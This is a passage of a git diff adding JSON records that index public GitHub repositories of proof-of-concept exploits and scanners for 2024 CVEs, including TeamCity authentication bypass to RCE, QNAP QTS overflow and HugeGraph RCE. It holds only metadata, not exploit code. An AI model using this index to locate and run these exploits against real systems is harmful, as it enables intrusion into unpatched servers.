b/2024/CVE-2024-26574.json @@ -0,0 +1,33 @@ +[ + { + "id": 782022650, + "name": "CVE-2024-26574", + "full_name": "Alaatk\/CVE-2024-26574", + "owner": { + "login": "Alaatk", + "id": 21007805, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21007805?v=4", + "html_url": "https:\/\/github.com\/Alaatk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alaatk\/CVE-2024-26574", + "description": "Wondershare Filmora v.13.0.51 - Insecure Permissions Privilege Escalation", + "fork": false, + "created_at": "2024-04-04T13:44:08Z", + "updated_at": "2024-04-17T11:50:47Z", + "pushed_at": "2024-04-04T13:49:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-26581.json b/2024/CVE-2024-26581.json new file mode 100644 index 0000000000..8f8a200e26 --- /dev/null +++ b/2024/CVE-2024-26581.json @@ -0,0 +1,73 @@ +[ + { + "id": 855087462, + "name": "CVE-2024-26581-Checker", + "full_name": "madfxr\/CVE-2024-26581-Checker", + "owner": { + "login": "madfxr", + "id": 30550561, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30550561?v=4", + "html_url": "https:\/\/github.com\/madfxr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/madfxr\/CVE-2024-26581-Checker", + "description": "[CVE-2024-26581] Vulnerability Checker for BGN Internal", + "fork": false, + "created_at": "2024-09-10T09:32:25Z", + "updated_at": "2024-09-23T07:56:31Z", + "pushed_at": "2024-09-23T07:56:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bash", + "bash-scripting", + "cve-2024-26581", + "cybersecurity", + "kernel", + "linux", + "nftables", + "shell-scripting" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 855652997, + "name": "Linux-Root-CVE-2024-26581-PoC", + "full_name": "laoqin1234\/Linux-Root-CVE-2024-26581-PoC", + "owner": { + "login": "laoqin1234", + "id": 23544811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23544811?v=4", + "html_url": "https:\/\/github.com\/laoqin1234", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/laoqin1234\/Linux-Root-CVE-2024-26581-PoC", + "description": null, + "fork": false, + "created_at": "2024-09-11T08:29:40Z", + "updated_at": "2024-09-11T08:29:40Z", + "pushed_at": "2024-09-11T08:29:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-2667.json b/2024/CVE-2024-2667.json new file mode 100644 index 0000000000..edf473c35e --- /dev/null +++ b/2024/CVE-2024-2667.json @@ -0,0 +1,64 @@ +[ + { + "id": 793188530, + "name": "CVE-2024-2667", + "full_name": "Puvipavan\/CVE-2024-2667", + "owner": { + "login": "Puvipavan", + "id": 14966528, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14966528?v=4", + "html_url": "https:\/\/github.com\/Puvipavan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Puvipavan\/CVE-2024-2667", + "description": "This is POC for CVE-2024-2667 (InstaWP Connect – 1-click WP Staging & Migration <= 0.1.0.22 - Unauthenticated Arbitrary File Upload)", + "fork": false, + "created_at": "2024-04-28T17:14:47Z", + "updated_at": "2024-05-20T08:06:42Z", + "pushed_at": "2024-04-28T17:30:15Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 912431927, + "name": "CVE-2024-2667-Poc", + "full_name": "Nxploited\/CVE-2024-2667-Poc", + "owner": { + "login": "Nxploited", + "id": 188819918, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/188819918?v=4", + "html_url": "https:\/\/github.com\/Nxploited", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nxploited\/CVE-2024-2667-Poc", + "description": null, + "fork": false, + "created_at": "2025-01-05T15:03:50Z", + "updated_at": "2025-01-05T16:21:03Z", + "pushed_at": "2025-01-05T16:21:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-26817.json b/2024/CVE-2024-26817.json new file mode 100644 index 0000000000..9093bc0567 --- /dev/null +++ b/2024/CVE-2024-26817.json @@ -0,0 +1,33 @@ +[ + { + "id": 786424034, + "name": "CVE-2024-26817-amdkfd", + "full_name": "MaherAzzouzi\/CVE-2024-26817-amdkfd", + "owner": { + "login": "MaherAzzouzi", + "id": 62230190, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62230190?v=4", + "html_url": "https:\/\/github.com\/MaherAzzouzi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MaherAzzouzi\/CVE-2024-26817-amdkfd", + "description": "Potential Integer Overflow Leading To Heap Overflow in AMD KFD.", + "fork": false, + "created_at": "2024-04-14T12:25:50Z", + "updated_at": "2024-04-15T15:01:56Z", + "pushed_at": "2024-04-14T12:30:21Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27088.json b/2024/CVE-2024-27088.json new file mode 100644 index 0000000000..639d067b80 --- /dev/null +++ b/2024/CVE-2024-27088.json @@ -0,0 +1,33 @@ +[ + { + "id": 845361466, + "name": "CVE-2024-27088", + "full_name": "200101WhoAmI\/CVE-2024-27088", + "owner": { + "login": "200101WhoAmI", + "id": 176820518, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176820518?v=4", + "html_url": "https:\/\/github.com\/200101WhoAmI", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/200101WhoAmI\/CVE-2024-27088", + "description": "redos", + "fork": false, + "created_at": "2024-08-21T05:21:38Z", + "updated_at": "2024-08-21T05:21:58Z", + "pushed_at": "2024-08-21T05:21:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27130.json b/2024/CVE-2024-27130.json new file mode 100644 index 0000000000..6a821fde53 --- /dev/null +++ b/2024/CVE-2024-27130.json @@ -0,0 +1,95 @@ +[ + { + "id": 801938261, + "name": "CVE-2024-27130", + "full_name": "watchtowrlabs\/CVE-2024-27130", + "owner": { + "login": "watchtowrlabs", + "id": 99977116, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99977116?v=4", + "html_url": "https:\/\/github.com\/watchtowrlabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/watchtowrlabs\/CVE-2024-27130", + "description": "PoC for CVE-2024-27130", + "fork": false, + "created_at": "2024-05-17T07:58:01Z", + "updated_at": "2024-12-26T23:45:37Z", + "pushed_at": "2024-05-17T10:27:07Z", + "stargazers_count": 33, + "watchers_count": 33, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 33, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 803775593, + "name": "CVE-2024-27130", + "full_name": "d0rb\/CVE-2024-27130", + "owner": { + "login": "d0rb", + "id": 10403781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4", + "html_url": "https:\/\/github.com\/d0rb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d0rb\/CVE-2024-27130", + "description": "This Python script is designed as a proof-of-concept (PoC) for the CVE-2024-27130 vulnerability in QNAP QTS", + "fork": false, + "created_at": "2024-05-21T11:14:22Z", + "updated_at": "2024-06-06T09:32:41Z", + "pushed_at": "2024-05-21T11:21:42Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 892653629, + "name": "cve-2024-27130-poc", + "full_name": "XiaomingX\/cve-2024-27130-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-27130-poc", + "description": "CVE-2024-27130是影响QNAP网络附加存储(NAS)设备的一个严重漏洞。该漏洞源于QTS操作系统中share.cgi脚本的No_Support_ACL函数中不安全地使用strcpy函数,导致堆栈缓冲区溢出。攻击者可以利用此漏洞,通过精心构造的请求在目标系统上执行任意代码,进而完全控制受影响的设备。 ", + "fork": false, + "created_at": "2024-11-22T14:18:08Z", + "updated_at": "2024-12-08T18:37:22Z", + "pushed_at": "2024-11-22T14:20:28Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27173.json b/2024/CVE-2024-27173.json new file mode 100644 index 0000000000..04072b376b --- /dev/null +++ b/2024/CVE-2024-27173.json @@ -0,0 +1,33 @@ +[ + { + "id": 815013986, + "name": "0day-POC-for-CVE-2024-27173", + "full_name": "Ieakd\/0day-POC-for-CVE-2024-27173", + "owner": { + "login": "Ieakd", + "id": 172750219, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172750219?v=4", + "html_url": "https:\/\/github.com\/Ieakd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ieakd\/0day-POC-for-CVE-2024-27173", + "description": null, + "fork": false, + "created_at": "2024-06-14T07:04:46Z", + "updated_at": "2024-06-14T07:08:01Z", + "pushed_at": "2024-06-14T07:07:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27198.json b/2024/CVE-2024-27198.json new file mode 100644 index 0000000000..8b3955dec0 --- /dev/null +++ b/2024/CVE-2024-27198.json @@ -0,0 +1,442 @@ +[ + { + "id": 767217611, + "name": "CVE-2024-27198", + "full_name": "Chocapikk\/CVE-2024-27198", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-27198", + "description": "Proof of Concept for Authentication Bypass in JetBrains TeamCity Pre-2023.11.4", + "fork": false, + "created_at": "2024-03-04T22:44:36Z", + "updated_at": "2024-12-10T18:19:35Z", + "pushed_at": "2024-03-05T20:53:11Z", + "stargazers_count": 32, + "watchers_count": 32, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 32, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 767340674, + "name": "CVE-2024-27198", + "full_name": "yoryio\/CVE-2024-27198", + "owner": { + "login": "yoryio", + "id": 134471901, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134471901?v=4", + "html_url": "https:\/\/github.com\/yoryio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yoryio\/CVE-2024-27198", + "description": "Exploit for CVE-2024-27198 - TeamCity Server", + "fork": false, + "created_at": "2024-03-05T05:43:06Z", + "updated_at": "2024-12-19T04:08:46Z", + "pushed_at": "2024-12-19T04:08:43Z", + "stargazers_count": 32, + "watchers_count": 32, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-27198", + "teamcity-server" + ], + "visibility": "public", + "forks": 4, + "watchers": 32, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 767867288, + "name": "CVE-2024-27198-RCE", + "full_name": "W01fh4cker\/CVE-2024-27198-RCE", + "owner": { + "login": "W01fh4cker", + "id": 101872898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101872898?v=4", + "html_url": "https:\/\/github.com\/W01fh4cker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/W01fh4cker\/CVE-2024-27198-RCE", + "description": "CVE-2024-27198 & CVE-2024-27199 Authentication Bypass --> RCE in JetBrains TeamCity Pre-2023.11.4", + "fork": false, + "created_at": "2024-03-06T03:15:03Z", + "updated_at": "2024-12-15T00:00:49Z", + "pushed_at": "2024-03-11T07:57:40Z", + "stargazers_count": 146, + "watchers_count": 146, + "has_discussions": false, + "forks_count": 36, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day", + "auth", + "cve-2024-27198", + "cve-2024-27199", + "exploit", + "jetbrains", + "rce", + "redteam", + "teamcity" + ], + "visibility": "public", + "forks": 36, + "watchers": 146, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 768698596, + "name": "CVE-2024-27198", + "full_name": "rampantspark\/CVE-2024-27198", + "owner": { + "login": "rampantspark", + "id": 80992075, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80992075?v=4", + "html_url": "https:\/\/github.com\/rampantspark", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rampantspark\/CVE-2024-27198", + "description": "A PoC for CVE-2024-27198 written in golang", + "fork": false, + "created_at": "2024-03-07T15:12:56Z", + "updated_at": "2024-03-07T16:44:20Z", + "pushed_at": "2024-03-10T16:57:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-27198", + "teamcity-2023-11-4" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 769143780, + "name": "CVE-2024-27198-RCE", + "full_name": "passwa11\/CVE-2024-27198-RCE", + "owner": { + "login": "passwa11", + "id": 112363374, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112363374?v=4", + "html_url": "https:\/\/github.com\/passwa11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/passwa11\/CVE-2024-27198-RCE", + "description": null, + "fork": false, + "created_at": "2024-03-08T12:40:09Z", + "updated_at": "2024-10-01T21:19:37Z", + "pushed_at": "2024-03-08T12:40:19Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 769432413, + "name": "CVE-2024-27198-RCE", + "full_name": "CharonDefalt\/CVE-2024-27198-RCE", + "owner": { + "login": "CharonDefalt", + "id": 103410775, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103410775?v=4", + "html_url": "https:\/\/github.com\/CharonDefalt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CharonDefalt\/CVE-2024-27198-RCE", + "description": null, + "fork": false, + "created_at": "2024-03-09T04:04:23Z", + "updated_at": "2024-12-11T14:02:42Z", + "pushed_at": "2024-03-09T04:09:09Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 769726782, + "name": "CVE-2024-27198-EXPLOIT", + "full_name": "K3ysTr0K3R\/CVE-2024-27198-EXPLOIT", + "owner": { + "login": "K3ysTr0K3R", + "id": 70909693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2024-27198-EXPLOIT", + "description": "A PoC exploit for CVE-2024-27198 - JetBrains TeamCity Authentication Bypass", + "fork": false, + "created_at": "2024-03-09T22:04:07Z", + "updated_at": "2024-12-10T18:46:53Z", + "pushed_at": "2024-03-09T22:16:46Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "authentication-bypass", + "cve-2024-27198", + "exploit", + "exploitation", + "hacked", + "jetbrains", + "poc", + "scanner", + "teamcity" + ], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 780859868, + "name": "Explora-o-RCE-n-o-autenticado-JetBrains-TeamCity-CVE-2024-27198-", + "full_name": "Shimon03\/Explora-o-RCE-n-o-autenticado-JetBrains-TeamCity-CVE-2024-27198-", + "owner": { + "login": "Shimon03", + "id": 78235187, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78235187?v=4", + "html_url": "https:\/\/github.com\/Shimon03", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Shimon03\/Explora-o-RCE-n-o-autenticado-JetBrains-TeamCity-CVE-2024-27198-", + "description": "Em fevereiro de 2024, foi identificado duas novas vulnerabilidades que afetam o servidor JetBrains TeamCity (CVE-2024-27198 e CVE-2024-27199)", + "fork": false, + "created_at": "2024-04-02T09:46:51Z", + "updated_at": "2024-04-02T09:46:51Z", + "pushed_at": "2024-04-02T09:46:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 790442683, + "name": "RCity-CVE-2024-27198", + "full_name": "Stuub\/RCity-CVE-2024-27198", + "owner": { + "login": "Stuub", + "id": 60468836, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60468836?v=4", + "html_url": "https:\/\/github.com\/Stuub", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Stuub\/RCity-CVE-2024-27198", + "description": "CVE-2024-27198 & CVE-2024-27199 PoC - RCE, Admin Account Creation, Enum Users, Server Information", + "fork": false, + "created_at": "2024-04-22T22:14:24Z", + "updated_at": "2024-12-09T06:46:31Z", + "pushed_at": "2024-07-19T14:42:24Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "code-injection", + "cve", + "cve-2024-27198", + "cve-2024-27199", + "jetbrains", + "owasp", + "python", + "python3", + "rce", + "teamcity" + ], + "visibility": "public", + "forks": 2, + "watchers": 27, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 831484050, + "name": "CVE-2024-27198", + "full_name": "HPT-Intern-Task-Submission\/CVE-2024-27198", + "owner": { + "login": "HPT-Intern-Task-Submission", + "id": 169382051, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/169382051?v=4", + "html_url": "https:\/\/github.com\/HPT-Intern-Task-Submission", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HPT-Intern-Task-Submission\/CVE-2024-27198", + "description": null, + "fork": false, + "created_at": "2024-07-20T17:26:13Z", + "updated_at": "2024-07-20T17:28:45Z", + "pushed_at": "2024-07-20T17:28:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 843255325, + "name": "CVE-2024-27198", + "full_name": "jrbH4CK\/CVE-2024-27198", + "owner": { + "login": "jrbH4CK", + "id": 163496398, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/163496398?v=4", + "html_url": "https:\/\/github.com\/jrbH4CK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jrbH4CK\/CVE-2024-27198", + "description": "PoC about CVE-2024-27198", + "fork": false, + "created_at": "2024-08-16T05:39:57Z", + "updated_at": "2024-08-16T16:43:59Z", + "pushed_at": "2024-08-16T16:43:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 870123268, + "name": "CVE-2024-27198", + "full_name": "geniuszly\/CVE-2024-27198", + "owner": { + "login": "geniuszly", + "id": 137893386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/137893386?v=4", + "html_url": "https:\/\/github.com\/geniuszly", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geniuszly\/CVE-2024-27198", + "description": "is a PoC tool that targets a vulnerability in the TeamCity server (CVE-2024-27198)", + "fork": false, + "created_at": "2024-10-09T13:36:56Z", + "updated_at": "2024-10-21T08:14:55Z", + "pushed_at": "2024-10-09T13:37:56Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 872559049, + "name": "CVE-2024-27198_POC", + "full_name": "Cythonic1\/CVE-2024-27198_POC", + "owner": { + "login": "Cythonic1", + "id": 163199970, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/163199970?v=4", + "html_url": "https:\/\/github.com\/Cythonic1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cythonic1\/CVE-2024-27198_POC", + "description": "a proof of concept of the CVE-2024-27198 which infect jetbrains teamCity", + "fork": false, + "created_at": "2024-10-14T16:40:58Z", + "updated_at": "2024-10-21T13:17:52Z", + "pushed_at": "2024-10-21T10:05:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27292.json b/2024/CVE-2024-27292.json new file mode 100644 index 0000000000..6e8c8ed91a --- /dev/null +++ b/2024/CVE-2024-27292.json @@ -0,0 +1,64 @@ +[ + { + "id": 822912763, + "name": "CVE-2024-27292", + "full_name": "th3gokul\/CVE-2024-27292", + "owner": { + "login": "th3gokul", + "id": 89386101, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89386101?v=4", + "html_url": "https:\/\/github.com\/th3gokul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/th3gokul\/CVE-2024-27292", + "description": "CVE-2024-27292 : Docassemble V1.4.96 Unauthenticated Path Traversal", + "fork": false, + "created_at": "2024-07-02T04:41:35Z", + "updated_at": "2024-08-01T14:45:11Z", + "pushed_at": "2024-07-02T11:39:54Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 906487773, + "name": "Docassemble_poc", + "full_name": "NingXin2002\/Docassemble_poc", + "owner": { + "login": "NingXin2002", + "id": 138864342, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/138864342?v=4", + "html_url": "https:\/\/github.com\/NingXin2002", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NingXin2002\/Docassemble_poc", + "description": "Docassemble任意文件读取漏洞(CVE-2024-27292)", + "fork": false, + "created_at": "2024-12-21T03:35:19Z", + "updated_at": "2024-12-26T16:21:16Z", + "pushed_at": "2024-12-21T03:36:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27316.json b/2024/CVE-2024-27316.json new file mode 100644 index 0000000000..ccc6dc2752 --- /dev/null +++ b/2024/CVE-2024-27316.json @@ -0,0 +1,71 @@ +[ + { + "id": 784116051, + "name": "CVE-2024-27316", + "full_name": "lockness-Ko\/CVE-2024-27316", + "owner": { + "login": "lockness-Ko", + "id": 42625905, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42625905?v=4", + "html_url": "https:\/\/github.com\/lockness-Ko", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lockness-Ko\/CVE-2024-27316", + "description": "Proof of concept (PoC) for CVE-2024-27316 (tested), CVE-2024-30255 (untested), CVE-2024-31309 (untested), CVE-2024-28182 (untested), CVE-2024-2653 (untested) and CVE-2024-27919 (untested)", + "fork": false, + "created_at": "2024-04-09T08:08:07Z", + "updated_at": "2024-12-16T23:49:39Z", + "pushed_at": "2024-04-13T09:02:39Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-2653", + "cve-2024-27316", + "cve-2024-27919", + "cve-2024-28182", + "cve-2024-30255", + "cve-2024-31309" + ], + "visibility": "public", + "forks": 3, + "watchers": 14, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 788117590, + "name": "CVE-2024-27316_poc", + "full_name": "aeyesec\/CVE-2024-27316_poc", + "owner": { + "login": "aeyesec", + "id": 61375985, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61375985?v=4", + "html_url": "https:\/\/github.com\/aeyesec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aeyesec\/CVE-2024-27316_poc", + "description": null, + "fork": false, + "created_at": "2024-04-17T20:08:05Z", + "updated_at": "2024-07-13T18:36:41Z", + "pushed_at": "2024-04-17T21:31:35Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27348.json b/2024/CVE-2024-27348.json new file mode 100644 index 0000000000..35e2e2bba6 --- /dev/null +++ b/2024/CVE-2024-27348.json @@ -0,0 +1,123 @@ +[ + { + "id": 808784376, + "name": "CVE-2024-27348", + "full_name": "Zeyad-Azima\/CVE-2024-27348", + "owner": { + "login": "Zeyad-Azima", + "id": 62406753, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62406753?v=4", + "html_url": "https:\/\/github.com\/Zeyad-Azima", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Zeyad-Azima\/CVE-2024-27348", + "description": "Apache HugeGraph Server RCE Scanner ( CVE-2024-27348 )", + "fork": false, + "created_at": "2024-05-31T20:11:37Z", + "updated_at": "2024-12-26T06:26:46Z", + "pushed_at": "2024-06-08T09:12:43Z", + "stargazers_count": 60, + "watchers_count": 60, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "cve", + "cve-scanning", + "exploit", + "vulnerability", + "vulnerability-scanners" + ], + "visibility": "public", + "forks": 15, + "watchers": 60, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 809953064, + "name": "CVE-2024-27348", + "full_name": "kljunowsky\/CVE-2024-27348", + "owner": { + "login": "kljunowsky", + "id": 104329412, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104329412?v=4", + "html_url": "https:\/\/github.com\/kljunowsky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kljunowsky\/CVE-2024-27348", + "description": "Apache HugeGraph Server Unauthenticated RCE - CVE-2024-27348 Proof of concept Exploit ", + "fork": false, + "created_at": "2024-06-03T19:08:24Z", + "updated_at": "2024-12-14T03:58:01Z", + "pushed_at": "2024-06-03T19:20:10Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 8, + "allow_forking": 